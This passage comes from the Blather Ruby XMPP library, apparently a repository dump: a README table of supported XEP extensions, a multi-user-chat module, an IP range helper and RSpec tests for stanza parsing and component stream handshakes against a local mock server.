[XEP-0053](http://xmpp.org/extensions/xep-0053.html) | None | XMPP Registrar Function |
[XEP-0054](http://xmpp.org/extensions/xep-0054.html) | None | vcard-temp |
[XEP-0055](http://xmpp.org/extensions/xep-0055.html) | None | Jabber Search |
[XEP-0059](http://xmpp.org/extensions/xep-0059.html) | None | Result Set Management |
[XEP-0060](http://xmpp.org/extensions/xep-0060.html) | Partial | Publish-Subscribe |
[XEP-0065](http://xmpp.org/extensions/xep-0065.html) | None | SOCKS5 Bytestreams |
[XEP-0066](http://xmpp.org/extensions/xep-0066.html) | None | Out of Band Data |
[XEP-0068](http://xmpp.org/extensions/xep-0068.html) | None | Field Standardization for Data Forms |
[XEP-0070](http://xmpp.org/extensions/xep-0070.html) | None | Verifying HTTP Requests via XMPP |
[XEP-0071](http://xmpp.org/extensions/xep-0071.html) | Partial | XHTML-IM |
[XEP-0072](http://xmpp.org/extensions/xep-0072.html) | None | SOAP Over XMPP |
[XEP-0076](http://xmpp.org/extensions/xep-0076.html) | None | Malicious Stanzas |
[XEP-0077](http://xmpp.org/extensions/xep-0077.html) | Full | In-Band Registration |
[XEP-0079](http://xmpp.org/extensions/xep-0079.html) | None | Advanced Message Processing |
[XEP-0080](http://xmpp.org/extensions/xep-0080.html) | None | User Location |
[XEP-0082](http://xmpp.org/extensions/xep-0082.html) | None | XMPP Date and Time Profiles |
[XEP-0083](http://xmpp.org/extensions/xep-0083.html) | None | Nested Roster Groups |
[XEP-0084](http://xmpp.org/extensions/xep-0084.html) | None | User Avatar |
[XEP-0085](http://xmpp.org/extensions/xep-0085.html) | Partial | Chat State Notifications |
[XEP-0092](http://xmpp.org/extensions/xep-0092.html) | None | Software Version |
[XEP-0095](http://xmpp.org/extensions/xep-0095.html) | Partial | Stream Initiation |
[XEP-0096](http://xmpp.org/extensions/xep-0096.html) | Partial | SI File Transfer |
[XEP-0100](http://xmpp.org/extensions/xep-0100.html) | None | Gateway Interaction |
[XEP-0106](http://xmpp.org/extensions/xep-0106.html) | None | JID Escaping |
[XEP-0107](http://xmpp.org/extensions/xep-0107.html) | None | User Mood |
[XEP-0108](http://xmpp.org/extensions/xep-0108.html) | None | User Activity |
[XEP-0114](http://xmpp.org/extensions/xep-0114.html) | Full | Jabber Component Protocol |
[XEP-0115](http://xmpp.org/extensions/xep-0115.html) | Partial | Entity Capabilities |
[XEP-0118](http://xmpp.org/extensions/xep-0118.html) | None | User Tune |
[XEP-0122](http://xmpp.org/extensions/xep-0122.html) | None | Data Forms Validation |
[XEP-0124](http://xmpp.org/extensions/xep-0124.html) | None | Bidirectional-streams Over Synchronous HTTP (BOSH) |
[XEP-0126](http://xmpp.org/extensions/xep-0126.html) | None | Invisibility |
[XEP-0127](http://xmpp.org/extensions/xep-0127.html) | None | Common Alerting Protocol (CAP) Over XMPP |
[XEP-0128](http://xmpp.org/extensions/xep-0128.html) | None | Service Discovery Extensions |
[XEP-0130](http://xmpp.org/extensions/xep-0130.html) | None | Waiting Lists |
[XEP-0131](http://xmpp.org/extensions/xep-0131.html) | None | Stanza Headers and Internet Metadata |
[XEP-0132](http://xmpp.org/extensions/xep-0132.html) | None | Presence Obtained via Kinesthetic Excitation (POKE) |
[XEP-0133](http://xmpp.org/extensions/xep-0133.html) | None | Service Administration |
[XEP-0134](http://xmpp.org/extensions/xep-0134.html) | None | XMPP Design Guidelines |
[XEP-0136](http://xmpp.org/extensions/xep-0136.html) | None | Message Archiving |
[XEP-0137](http://xmpp.org/extensions/xep-0137.html) | None | Publishing Stream Initiation Requests |
[XEP-0138](http://xmpp.org/extensions/xep-0138.html) | None | Stream Compression |
[XEP-0141](http://xmpp.org/extensions/xep-0141.html) | None | Data Forms Layout |
[XEP-0143](http://xmpp.org/extensions/xep-0143.html) | None | Guidelines for Authors of XMPP Extension Protocols |
[XEP-0144](http://xmpp.org/extensions/xep-0144.html) | N/A | Roster Item Exchange |
[XEP-0145](http://xmpp.org/extensions/xep-0145.html) | None | Annotations |
[XEP-0146](http://xmpp.org/extensions/xep-0146.html) | None | Remote Controlling Clients |
[XEP-0147](http://xmpp.org/extensions/xep-0147.html) | None | XMPP URI Scheme Query Components |
[XEP-0148](http://xmpp.org/extensions/xep-0148.html) | None | Instant Messaging Intelligence Quotient (IM IQ) |
[XEP-0149](http://xmpp.org/extensions/xep-0149.html) | None | Time Periods |
[XEP-0153](http://xmpp.org/extensions/xep-0153.html) | None | vCard-Based Avatars |
[XEP-0155](http://xmpp.org/extensions/xep-0155.html) | None | Stanza Session Negotiation |
[XEP-0156](http://xmpp.org/extensions/xep-0156.html) | None | Discovering Alternative XMPP Connection Methods |
[XEP-0157](http://xmpp.org/extensions/xep-0157.html) | None | Contact Addresses for XMPP Services |
[XEP-0158](http://xmpp.org/extensions/xep-0158.html) | None | CAPTCHA Forms |
[XEP-0160](http://xmpp.org/extensions/xep-0160.html) | None | Best Practices for Handling Offline Messages |
[XEP-0163](http://xmpp.org/extensions/xep-0163.html) | Partial | Personal Eventing Protocol |
[XEP-0166](http://xmpp.org/extensions/xep-0166.html) | None | Jingle |
[XEP-0167](http://xmpp.org/extensions/xep-0167.html) | None | Jingle RTP Sessions |
[XEP-0169](http://xmpp.org/extensions/xep-0169.html) | None | Twas The Night Before Christmas (Jabber Version) |
[XEP-0170](http://xmpp.org/extensions/xep-0170.html) | None | Recommended Order of Stream Feature Negotiation |
[XEP-0171](http://xmpp.org/extensions/xep-0171.html) | None | Language Translation |
[XEP-0172](http://xmpp.org/extensions/xep-0172.html) | None | User Nickname |
[XEP-0174](http://xmpp.org/extensions/xep-0174.html) | None | Serverless Messaging |
[XEP-0175](http://xmpp.org/extensions/xep-0175.html) | None | Best Practices for Use of SASL ANONYMOUS |
[XEP-0176](http://xmpp.org/extensions/xep-0176.html) | None | Jingle ICE-UDP Transport Method |
[XEP-0177](http://xmpp.org/extensions/xep-0177.html) | None | Jingle Raw UDP Transport Method |
[XEP-0178](http://xmpp.org/extensions/xep-0178.html) | None | Best Practices for Use of SASL EXTERNAL with Certificates |
[XEP-0182](http://xmpp.org/extensions/xep-0182.html) | N/A | Application-Specific Error Conditions |
[XEP-0183](http://xmpp.org/extensions/xep-0183.html) | None | Jingle Telepathy Transport |
[XEP-0184](http://xmpp.org/extensions/xep-0184.html) | None | Message Delivery Receipts |
[XEP-0185](http://xmpp.org/extensions/xep-0185.html) | None | Dialback Key Generation and Validation |
[XEP-0191](http://xmpp.org/extensions/xep-0191.html) | None | Blocking Command|
[XEP-0198](http://xmpp.org/extensions/xep-0198.html) | None | Stream Management |
[XEP-0199](http://xmpp.org/extensions/xep-0199.html) | Partial | XMPP Ping |
[XEP-0201](http://xmpp.org/extensions/xep-0201.html) | None | Best Practices for Message Threads |
[XEP-0202](http://xmpp.org/extensions/xep-0202.html) | None | Entity Time |
[XEP-0203](http://xmpp.org/extensions/xep-0203.html) | Partial | Delayed Delivery |
[XEP-0205](http://xmpp.org/extensions/xep-0205.html) | None | Best Practices to Discourage Denial of Service Attacks |
[XEP-0206](http://xmpp.org/extensions/xep-0206.html) | None | XMPP Over BOSH |
[XEP-0207](http://xmpp.org/extensions/xep-0207.html) | None | XMPP Eventing via Pubsub |
[XEP-0220](http://xmpp.org/extensions/xep-0220.html) | None | Server Dialback |
[XEP-0221](http://xmpp.org/extensions/xep-0221.html) | None | Data Forms Media Element |
[XEP-0222](http://xmpp.org/extensions/xep-0222.html) | None | Persistent Storage of Public Data via PubSub |
[XEP-0223](http://xmpp.org/extensions/xep-0223.html) | None | Persistent Storage of Private Data via PubSub |
[XEP-0224](http://xmpp.org/extensions/xep-0224.html) | None | Attention |
[XEP-0227](http://xmpp.org/extensions/xep-0227.html) | None | Portable Import/Export Format for XMPP-IM Servers |
[XEP-0229](http://xmpp.org/extensions/xep-0229.html) | None | Stream Compression with LZW |
[XEP-0231](http://xmpp.org/extensions/xep-0231.html) | None | Bits of Binary |
[XEP-0233](http://xmpp.org/extensions/xep-0233.html) | None | Domain-Based Service Names in XMPP SASL Negotiation |
[XEP-0234](http://xmpp.org/extensions/xep-0234.html) | None | Jingle File Transfer |
[XEP-0239](http://xmpp.org/extensions/xep-0239.html) | None | Binary XMPP |
[XEP-0242](http://xmpp.org/extensions/xep-0242.html) | None | XMPP Client Compliance 2009 |
[XEP-0243](http://xmpp.org/extensions/xep-0243.html) | None | XMPP Server Compliance 2009 |
[XEP-0245](http://xmpp.org/extensions/xep-0245.html) | None | The /me Command |
[XEP-0249](http://xmpp.org/extensions/xep-0249.html) | None | Direct MUC Invitations |
[XEP-0256](http://xmpp.org/extensions/xep-0256.html) | None | Last Activity in Presence |
[XEP-0258](http://xmpp.org/extensions/xep-0258.html) | None | Security Labels in XMPP |
[XEP-0260](http://xmpp.org/extensions/xep-0260.html) | None | Jingle SOCKS5 Bytestreams Transport Method |
[XEP-0261](http://xmpp.org/extensions/xep-0261.html) | None | Jingle In-Band Bytestreams Transport Method |
[XEP-0262](http://xmpp.org/extensions/xep-0262.html) | None | Use of ZRTP in Jingle RTP Sessions |
[XEP-0263](http://xmpp.org/extensions/xep-0263.html) | None | ECO-XMPP |
[XEP-0266](http://xmpp.org/extensions/xep-0266.html) | None | Codecs for Jingle Audio |
[XEP-0267](http://xmpp.org/extensions/xep-0267.html) | None | Server Buddies |
[XEP-0270](http://xmpp.org/extensions/xep-0270.html) | None | XMPP Compliance Suites 2010 |
[XEP-0273](http://xmpp.org/extensions/xep-0273.html) | None | Stanza Interception and Filtering Technology (SIFT) |
[XEP-0277](http://xmpp.org/extensions/xep-0277.html) | None | Microblogging over XMPP |
[XEP-0278](http://xmpp.org/extensions/xep-0278.html) | None | Jingle Relay Nodes |
[XEP-0280](http://xmpp.org/extensions/xep-0280.html) | None | Message Carbons |
[XEP-0288](http://xmpp.org/extensions/xep-0288.html) | None | Bidirectional Server-to-Server Connections |
[XEP-0292](http://xmpp.org/extensions/xep-0292.html) | None | vCard4 Over XMPP |
[XEP-0293](http://xmpp.org/extensions/xep-0293.html) | None | Jingle RTP Feedback Negotiation |
[XEP-0294](http://xmpp.org/extensions/xep-0294.html) | None | Jingle RTP Header Extensions Negotiation |
[XEP-0295](http://xmpp.org/extensions/xep-0295.html) | None | JSON Encodings for XMPP |
[XEP-0296](http://xmpp.org/extensions/xep-0296.html) | None | Best Practices for Resource Locking |
[XEP-0297](http://xmpp.org/extensions/xep-0297.html) | None | Stanza Forwarding |
[XEP-0298](http://xmpp.org/extensions/xep-0298.html) | None | Delivering Conference Information to Jingle Participants (Coin) |
[XEP-0299](http://xmpp.org/extensions/xep-0299.html) | None | Codecs for Jingle Video |
[XEP-0300](http://xmpp.org/extensions/xep-0300.html) | None | Use of Cryptographic Hash Functions in XMPP |
[XEP-0301](http://xmpp.org/extensions/xep-0301.html) | None | In-Band Real Time Text |
[XEP-0302](http://xmpp.org/extensions/xep-0302.html) | None | XMPP Compliance Suites 2012 |
[XEP-0303](http://xmpp.org/extensions/xep-0303.html) | None | Commenting |
[XEP-0304](http://xmpp.org/extensions/xep-0304.html) | None | Whitespace Keepalive Negotiation |
[XEP-0305](http://xmpp.org/extensions/xep-0305.html) | None | XMPP Quickstart |
[XEP-0306](http://xmpp.org/extensions/xep-0306.html) | None | Extensible Status Conditions for Multi-User Chat |
[XEP-0307](http://xmpp.org/extensions/xep-0307.html) | None | Unique Room Names for Multi-User Chat |
[XEP-0308](http://xmpp.org/extensions/xep-0308.html) | None | Last Message Correction |
[XEP-0309](http://xmpp.org/extensions/xep-0309.html) | None | Service Directories |
[XEP-0310](http://xmpp.org/extensions/xep-0310.html) | None | Presence State Annotations |
[XEP-0311](http://xmpp.org/extensions/xep-0311.html) | None | MUC Fast Reconnect |
[XEP-0312](http://xmpp.org/extensions/xep-0312.html) | None | PubSub Since |
# Contributions
All contributions are welcome, even encouraged. However, contributions must be
well tested. If you send me a branch name to merge that'll get my attention faster
than a change set made directly on master.
# Author
* [<NAME>](http://github.com/sprsquish)
* [Other Contributors](https://github.com/adhearsion/blather/contributors)
# Copyright
Copyright (c) 2012 Adhearsion Foundation Inc. See LICENSE for details.
<file_sep>/lib/blather/stanza/muc/muc_user_base.rb
module Blather
class Stanza
class MUC
module MUCUserBase
MUC_USER_NAMESPACE = "http://jabber.org/protocol/muc#user"
def self.included(klass)
klass.extend ClassMethods
end
module ClassMethods
def new(*args)
super.tap { |e| e.muc_user }
end
end
def inherit(node)
muc_user.remove
super
self
end
def password
find_password_node && password_node.content
end
def password=(var)
password_node.content = var
end
def muc_user
unless muc_user = find_first('ns:x', :ns => MUC_USER_NAMESPACE)
self << (muc_user = XMPPNode.new('x', self.document))
muc_user.namespace = self.class.registered_ns
end
muc_user
end
def password_node
unless pw = find_password_node
muc_user << (pw = XMPPNode.new('password', self.document))
end
pw
end
def find_password_node
muc_user.find_first 'ns:password', :ns => MUC_USER_NAMESPACE
end
end # MUCUserBase
end # MUC
end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/pubsub_owner/delete_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSubOwner::Delete do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:delete, 'http://jabber.org/protocol/pubsub#owner')).to eq(Blather::Stanza::PubSubOwner::Delete)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(<<-NODE)).to be_instance_of Blather::Stanza::PubSubOwner::Delete
<iq type='set'
from='<EMAIL>/elsinore'
to='pubsub.shakespeare.lit'
id='delete1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub#owner'>
<delete node='princely_musings'/>
</pubsub>
</iq>
NODE
end
it 'ensures an delete node is present on delete' do
delete = Blather::Stanza::PubSubOwner::Delete.new
expect(delete.find('//ns:pubsub/ns:delete', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_empty
end
it 'ensures an delete node exists when calling #delete_node' do
delete = Blather::Stanza::PubSubOwner::Delete.new
delete.pubsub.remove_children :delete
expect(delete.find('//ns:pubsub/ns:delete', :ns => Blather::Stanza::PubSubOwner.registered_ns)).to be_empty
expect(delete.delete_node).not_to be_nil
expect(delete.find('//ns:pubsub/ns:delete', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
delete = Blather::Stanza::PubSubOwner::Delete.new
expect(delete.type).to eq(:set)
end
it 'sets the host if requested' do
delete = Blather::Stanza::PubSubOwner::Delete.new :set, 'pubsub.jabber.local'
expect(delete.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
delete = Blather::Stanza::PubSubOwner::Delete.new :set, 'host', 'node-name'
expect(delete.node).to eq('node-name')
end
end
<file_sep>/spec/blather/stream/component_spec.rb
require 'spec_helper'
describe Blather::Stream::Component do
let(:client) { mock 'Client' }
let(:server_port) { 50000 - rand(1000) }
let(:jid) { 'comp.id' }
before do
[:unbind, :post_init, :jid=].each do |m|
client.stubs(m) unless client.respond_to?(m)
end
client.stubs(:jid).returns jid
end
def mocked_server(times = nil, &block)
MockServer.any_instance.expects(:receive_data).send(*(times ? [:times, times] : [:at_least, 1])).with &block
EventMachine::run {
# Mocked server
EventMachine::start_server '127.0.0.1', server_port, ServerMock
# Blather::Stream connection
EM.connect('127.0.0.1', server_port, Blather::Stream::Component, client, jid, 'secret') { |c| @stream = c }
}
end
it 'can be started' do
params = [client, 'comp.id', 'secret', 'host', 1234]
EM.expects(:connect).with do |*parms|
parms[0] == 'host' &&
parms[1] == 1234 &&
parms[3] == client &&
parms[4] == 'comp.id'
end
Blather::Stream::Component.start *params
end
it 'shakes hands with the server' do
state = nil
mocked_server(2) do |val, server|
case state
when nil
state = :started
server.send_data "<?xml version='1.0'?><stream:stream xmlns='jabber:component:accept' xmlns:stream='http://etherx.jabber.org/streams' id='12345'>"
expect(val).to match(/stream:stream/)
when :started
server.send_data '<handshake/>'
EM.stop
expect(val).to eq("<handshake>#{Digest::SHA1.hexdigest('12345'+"secret")}</handshake>")
end
end
end
it 'raises a NoConnection exception if the connection is unbound before it can be completed' do
expect do
EventMachine::run {
EM.add_timer(0.5) { EM.stop if EM.reactor_running? }
Blather::Stream::Component.start client, jid, 'pass', '127.0.0.1', 50000 - rand(1000)
}
end.to raise_error Blather::Stream::ConnectionFailed
end
it 'starts the stream once the connection is complete' do
mocked_server(1) { |val, _| EM.stop; expect(val).to match(/stream:stream/) }
end
it 'sends stanzas to the client when the stream is ready' do
client.stubs :post_init
client.expects(:receive_data).with do |n|
EM.stop
n.kind_of? Blather::XMPPNode
end
state = nil
mocked_server(2) do |val, server|
case state
when nil
state = :started
server.send_data "<?xml version='1.0'?><stream:stream xmlns='jabber:component:accept' xmlns:stream='http://etherx.jabber.org/streams' id='12345'>"
expect(val).to match(/stream:stream/)
when :started
server.send_data '<handshake/>'
server.send_data "<message to='comp.id' from='d@e/f' type='chat' xml:lang='en'><body>Message!</body></message>"
expect(val).to eq("<handshake>#{Digest::SHA1.hexdigest('12345'+"secret")}</handshake>")
end
end
end
it 'sends stanzas to the wire ensuring "from" is set' do
EM.expects(:next_tick).at_least(1).yields
msg = Blather::Stanza::Message.new '<EMAIL>', 'body'
comp = Blather::Stream::Component.new nil, client, 'jid.com', 'pass'
comp.expects(:send_data).with { |s| expect(s).to match(/^<message[^>]*from="jid\.com"/) }
comp.send msg
end
end
<file_sep>/spec/blather/stanza/iq/ibr_spec.rb
require 'spec_helper'
def ibr_xml
<<-XML
<iq type='result' id='reg1'>
<query xmlns='jabber:iq:register'>
<instructions>
Choose a username and password for use with this service.
Please also provide your email address.
</instructions>
<username/>
<password/>
<email/>
</query>
</iq>
XML
end
describe Blather::Stanza::Iq::IBR do
let(:ibr) { Blather::Stanza::Iq::IBR.new }
let(:test_string) { "<a&a>" }
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:query, 'jabber:iq:register')).to eq(Blather::Stanza::Iq::IBR)
end
it 'can be imported' do
node = Blather::XMPPNode.parse ibr_xml
expect(node).to be_instance_of Blather::Stanza::Iq::IBR
end
describe '#registered' do
subject { ibr.registered? }
it { is_expected.to be false }
context 'true' do
let(:is_registered) { true }
subject do
ibr.registered = is_registered
ibr.registered?
end
it { is_expected.to be true }
end
context 'false' do
let(:is_registered) { false }
subject do
ibr.registered = is_registered
ibr.registered?
end
it { is_expected.to be false }
end
end
describe '#remove?' do
subject { ibr.remove? }
it { is_expected.to be false }
context '#remove!' do
subject do
ibr.remove!
ibr.remove?
end
it { is_expected.to be true }
end
end
describe '#form' do
subject { ibr.form }
it { is_expected.to be_instance_of Blather::Stanza::X }
end
describe '#instructions' do
subject do
ibr.instructions = test_string
ibr.instructions
end
it { is_expected.to eq test_string }
end
describe '#username' do
subject do
ibr.username = test_string
ibr.username
end
it { is_expected.to eq test_string }
end
describe '#nick' do
subject do
ibr.nick = test_string
ibr.nick
end
it { is_expected.to eq test_string }
end
describe '#password' do
subject do
ibr.password = test_string
ibr.password
end
it { is_expected.to eq test_string }
end
describe '#name' do
subject do
ibr.name = test_string
ibr.name
end
it { is_expected.to eq test_string }
end
describe '#first' do
subject do
ibr.first = test_string
ibr.first
end
it { is_expected.to eq test_string }
end
describe '#last' do
subject do
ibr.last = test_string
ibr.last
end
it { is_expected.to eq test_string }
end
describe '#email' do
subject do
ibr.email = test_string
ibr.email
end
it { is_expected.to eq test_string }
end
describe '#address' do
subject do
ibr.address = test_string
ibr.address
end
it { is_expected.to eq test_string }
end
describe '#city' do
subject do
ibr.city = test_string
ibr.city
end
it { is_expected.to eq test_string }
end
describe '#state' do
subject do
ibr.state = test_string
ibr.state
end
it { is_expected.to eq test_string }
end
describe '#zip' do
subject do
ibr.zip = test_string
ibr.zip
end
it { is_expected.to eq test_string }
end
describe '#phone' do
subject do
ibr.phone = test_string
ibr.phone
end
it { is_expected.to eq test_string }
end
describe '#url' do
subject do
ibr.url = test_string
ibr.url
end
it { is_expected.to eq test_string }
end
describe '#date' do
subject do
ibr.date = test_string
ibr.date
end
it { is_expected.to eq test_string }
end
end
<file_sep>/spec/blather/stanza/presence/c_spec.rb
require 'spec_helper'
def c_xml
<<-XML
<presence from='<EMAIL>/globe'>
<c xmlns='http://jabber.org/protocol/caps'
hash='sha-1'
node='http://www.chatopus.com'
ver='zHyEOgxTrkpSdGcQKH8EFPLsriY='/>
</presence>
XML
end
describe 'Blather::Stanza::Presence::C' do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:c, 'http://jabber.org/protocol/caps' )).to eq(Blather::Stanza::Presence::C)
end
it 'must be importable' do
c = Blather::XMPPNode.parse c_xml
expect(c).to be_kind_of Blather::Stanza::Presence::C::InstanceMethods
expect(c.hash).to eq(:'sha-1')
expect(c.node).to eq('http://www.chatopus.com')
expect(c.ver).to eq('zHyEOgxTrkpSdGcQKH8EFPLsriY=')
end
it 'ensures hash is one of Blather::Stanza::Presence::C::VALID_HASH_TYPES' do
expect { Blather::Stanza::Presence::C.new nil, nil, :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::Presence::C::VALID_HASH_TYPES.each do |valid_hash|
c = Blather::Stanza::Presence::C.new nil, nil, valid_hash
expect(c.hash).to eq(valid_hash.to_sym)
end
end
it 'can set a hash on creation' do
c = Blather::Stanza::Presence::C.new nil, nil, :md5
expect(c.hash).to eq(:md5)
end
it 'can set a node on creation' do
c = Blather::Stanza::Presence::C.new 'http://www.chatopus.com'
expect(c.node).to eq('http://www.chatopus.com')
end
it 'can set a ver on creation' do
c = Blather::Stanza::Presence::C.new nil, 'zHyEOgxTrkpSdGcQKH8EFPLsriY='
expect(c.ver).to eq('zHyEOgxTrkpSdGcQKH8EFPLsriY=')
end
it 'is equal on import and creation' do
p = Blather::XMPPNode.parse c_xml
c = Blather::Stanza::Presence::C.new 'http://www.chatopus.com', 'zHyEOgxTrkpSdGcQKH8EFPLsriY=', 'sha-1'
expect(p).to eq(c)
end
end
<file_sep>/spec/blather/stanza/pubsub/unsubscribe_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Unsubscribe do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:unsubscribe, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Unsubscribe)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(unsubscribe_xml)).to be_instance_of Blather::Stanza::PubSub::Unsubscribe
end
it 'ensures an unsubscribe node is present on create' do
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node', 'jid'
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures an unsubscribe node exists when calling #unsubscribe' do
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node', 'jid'
unsubscribe.pubsub.remove_children :unsubscribe
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(unsubscribe.unsubscribe).not_to be_nil
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node', 'jid'
expect(unsubscribe.type).to eq(:set)
end
it 'sets the host if requested' do
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'pubsub.jabber.local', 'node', 'jid'
expect(unsubscribe.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid'
expect(unsubscribe.node).to eq('node-name')
end
it 'has a node attribute' do
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid'
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(unsubscribe.node).to eq('node-name')
unsubscribe.node = 'new-node'
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@node="new-node"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(unsubscribe.node).to eq('new-node')
end
it 'has a jid attribute' do
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid'
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@jid="jid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(unsubscribe.jid).to eq(Blather::JID.new('jid'))
unsubscribe.jid = Blather::JID.new('n@d/r')
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@jid="n@d/r"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(unsubscribe.jid).to eq(Blather::JID.new('n@d/r'))
end
it 'has a subid attribute' do
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid'
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@subid="subid"]', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
unsubscribe = Blather::Stanza::PubSub::Unsubscribe.new :set, 'host', 'node-name', 'jid', 'subid'
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@subid="subid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(unsubscribe.subid).to eq('subid')
unsubscribe.subid = 'newsubid'
expect(unsubscribe.find('//ns:pubsub/ns:unsubscribe[@subid="newsubid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(unsubscribe.subid).to eq('newsubid')
end
end
<file_sep>/spec/blather/stanza/iq/s5b_spec.rb
require 'spec_helper'
def s5b_open_xml
<<-XML
<iq from='<EMAIL>/foo'
id='hu3vax16'
to='<EMAIL>/bar'
type='set'>
<query xmlns='http://jabber.org/protocol/bytestreams'
sid='vxf9n471bn46'>
<streamhost
jid='<EMAIL>/foo'
host='192.168.4.1'
port='5086'/>
<streamhost
jid='<EMAIL>/foo'
host='192.168.4.2'
port='5087'/>
</query>
</iq>
XML
end
describe Blather::Stanza::Iq::S5b do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:query, 'http://jabber.org/protocol/bytestreams')).to eq(Blather::Stanza::Iq::S5b)
end
it 'can be imported' do
node = Blather::XMPPNode.parse s5b_open_xml
expect(node).to be_instance_of Blather::Stanza::Iq::S5b
end
it 'can get sid' do
node = Blather::XMPPNode.parse s5b_open_xml
expect(node.sid).to eq('vxf9n471bn46')
end
it 'can get streamhosts' do
node = Blather::XMPPNode.parse s5b_open_xml
expect(node.streamhosts.size).to eq(2)
end
it 'can set streamhosts' do
node = Blather::Stanza::Iq::S5b.new
node.streamhosts += [{:jid => '<EMAIL>/foo', :host => '192.168.5.1', :port => 123}]
expect(node.streamhosts.size).to eq(1)
node.streamhosts += [Blather::Stanza::Iq::S5b::StreamHost.new('<EMAIL>/foo', '192.168.5.2', 123)]
expect(node.streamhosts.size).to eq(2)
end
it 'can get and set streamhost-used' do
node = Blather::Stanza::Iq::S5b.new
node.streamhost_used = 'used<EMAIL>/foo'
expect(node.streamhost_used.jid.to_s).to eq('used<EMAIL>/foo')
end
end
<file_sep>/spec/blather_spec.rb
require 'spec_helper'
describe Blather do
describe "while accessing to Logger object" do
it "should return a Logger instance" do
expect(Blather.logger).to be_instance_of Logger
end
end
describe "while using the log method" do
after do
Blather.default_log_level = :debug
end
it "should forward to debug by default" do
Blather.logger.expects(:debug).with("foo bar").once
Blather.log "foo bar"
end
%w<debug info error fatal>.each do |val|
it "should forward to #{val} if configured that default level" do
Blather.logger.expects(val.to_sym).with("foo bar").once
Blather.default_log_level = val.to_sym
Blather.log "foo bar"
end
end
end
end
<file_sep>/lib/blather/core_ext/ipaddr.rb
# @private
class IPAddr
PrivateRanges = [
IPAddr.new("10.0.0.0/8"),
IPAddr.new("172.16.0.0/12"),
IPAddr.new("192.168.0.0/16")
]
def private?
return false unless self.ipv4?
PrivateRanges.each do |ipr|
return true if ipr.include?(self)
end
return false
end
def public?
!private?
end
end
<file_sep>/lib/blather/stanza/pubsub/errors.rb
module Blather
class Stanza
# # PusSub Error Stanza
#
# @private
class PubSubErrors < PubSub
def node
read_attr :node
end
def node=(node)
write_attr :node, node
end
end # PubSubErrors
end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/iq/query_spec.rb
require 'spec_helper'
describe Blather::Stanza::Iq::Query do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:query, nil)).to eq(Blather::Stanza::Iq::Query)
end
it 'can be imported' do
string = <<-XML
<iq from='<EMAIL>/balcony' type='set' id='roster_4'>
<query>
<item jid='<EMAIL>' subscription='remove'/>
</query>
</iq>
XML
expect(Blather::XMPPNode.parse(string)).to be_instance_of Blather::Stanza::Iq::Query
end
it 'ensures a query node is present on create' do
query = Blather::Stanza::Iq::Query.new
expect(query.xpath('query')).not_to be_empty
end
it 'ensures a query node exists when calling #query' do
query = Blather::Stanza::Iq::Query.new
query.remove_child :query
expect(query.xpath('query')).to be_empty
expect(query.query).not_to be_nil
expect(query.xpath('query')).not_to be_empty
end
[:get, :set, :result, :error].each do |type|
it "can be set as \"#{type}\"" do
query = Blather::Stanza::Iq::Query.new type
expect(query.type).to eq(type)
end
end
it 'sets type to "result" on reply' do
query = Blather::Stanza::Iq::Query.new
expect(query.type).to eq(:get)
reply = expect(query.reply.type).to eq(:result)
end
it 'sets type to "result" on reply!' do
query = Blather::Stanza::Iq::Query.new
expect(query.type).to eq(:get)
query.reply!
expect(query.type).to eq(:result)
end
it 'can be registered under a namespace' do
class QueryNs < Blather::Stanza::Iq::Query; register :query_ns, nil, 'query:ns'; end
